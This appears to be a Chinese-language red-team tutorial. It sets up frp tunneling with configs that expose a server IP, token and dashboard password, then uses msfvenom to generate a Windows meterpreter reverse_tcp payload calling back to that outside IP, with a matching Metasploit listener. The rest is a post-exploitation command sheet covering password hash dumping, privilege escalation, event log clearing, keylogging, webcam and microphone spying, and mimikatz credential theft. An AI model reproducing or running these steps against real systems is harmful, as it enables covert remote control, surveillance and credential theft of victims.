frp内网穿透

download

1
2
wget https://kgithub.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz 
tar -zxvf frp_0.33.0_linux_amd64.tar.gz

frps.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[common]
# frp监听的端口,默认是7000,可以改成其他的
bind_port = 7000
# 授权码,请改成更复杂的
token = zhaobohong1
# 这个token之后在客户端会用到

# frp管理后台端口,请按自己需求更改
dashboard_port = 7500

# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = zhaobohong1
enable_prometheus = true

# frp日志配置
log_file = /var/log/frps.log
log_level = info
log_max_days = 3

frpc.ini

1
2
3
4
5
6
7
8
9
10
11
12
[common]
server_addr = 162.14.67.177
server_port = 7000
token = zhaobohong1
# 以上为frp服务器信息

# 以下为本地内网客户端信息
[MSF]
type = tcp
local_ip = 0.0.0.0
local_port = 8050
remote_port = 8050

设置frp服务

1
2
3
4
5
6
sudo mkdir -p /etc/frp 
sudo cp frps.ini /etc/frp
sudo cp frps /usr/bin
sudo cp systemd/frps.service /usr/lib/systemd/system/
sudo systemctl enable frps
sudo systemctl start frps

msf生成raw

1
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=162.14.67.177 LPORT=8050 -f raw -o beacon.bin

exploit

1
2
3
4
5
use exploit/multi/handler
set playload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8050
exploit

若要和cs联动,回到cs上 用Spawn 派生会话到msf

后渗透meterpreter使用

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力。

基础命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
sessions -i 进入会话
sessions -k 杀死会话
pwd 查看当前目录
getuid 查看当前用户信息
sysinfo 查看远程主机系统信息
execute 在目标主机上执行命令
hashdump 获取目标主机用户密码hash信息(只要我们能够获取到目标的用户凭证,那么即使目标修补了漏洞,我们还是可以控制目标)
getsystem 提升权限(通过内置的提权组件来尝试获取到系统权限)
shell 切换至传统shell
background 将当前session放入后台
kill 关闭进程
load 加载meterpreter扩展
exit 退出当前shell
arp 显示ARP缓存
getproxy 显示当前代理配置
ifconfig 显示接口
ipconfig 显示接口
netstat 显示网络连接
portfwd 将本地端口转发到远程服务
route 查看和修改路由
getenv 查看环境变量
getprivs 查看权限
pgrep 搜索进程
ps 查看当前运行进程(主要查看有没有杀软,可以通过在线杀软对比来确定)
reboot 重启系统
reg 修改注册表
help 查看相关的命令
migrate 进程迁移(主要是防止当前的会话断开,所以尽快迁移到其他稳定的进程当中去,要注意两点:迁移的进程位数要一致,迁移的权限最好一致)
clearev 清除windows中的应用程序日志、系统日志、安全日志

File system Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
cat     查看文件
cd 更改目录
checksum 检索文件的校验和
cp 拷贝文件
dir 列出文件
download 下载文件
edit 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列表文件
mkdir 制作目录
mv 将源头移动到目的地
pwd 打印工作目录
rm 删除指定的文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录

用户设备命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
enumdesktops   列出所有可访问的桌面和窗口
getdesktop 获取当前桌面
idletime 获取远程系统已运行时间(从上次重新启动开始计算)
keyboard_send 发送击键
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户的桌面
screenshot 截屏
setdesktop 更改shell当前桌面
record_mic 记录麦克风一定秒数
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定网络摄像头拍摄
webcam_stream 播放指定网络摄像头的视频流
play 在目标系统播放音频

uictl开关键盘/鼠标

1
2
3
uictl [enable/disable] [keyboard/mouse/all] 开启或禁止键盘/鼠标 
uictl disable mouse
uictl disable keyboard

webcam摄像头命令

1
2
3
webcam_list 查看摄像头列表
webcam_snap -i 1 从指定的网络摄像头拍摄快照
webcam_stream -i 1 播放指定网络摄像头的视频流

execute执行文件

1
2
execute 在目标机中执行文件 
execute -H -i -f Calc.exe 创建新进程cmd.exe,-H不可见,-i交互

mimikatz抓取密码

1
2
3
load mimikatz   加载mimikatz模块
help mimikatz 查看帮助
wdigest 获取密码

远程桌面&截屏

1
2
3
4
5
6
enumdesktops 查看可用的桌面 
getdesktop 获取当前meterpreter关联的桌面
set_desktop 设置meterpreter关联的桌面 -h查看帮助
screenshot 截屏
use espia 或者使用espia模块截屏 然后输入screengrab
run vnc 使用vnc远程桌面连接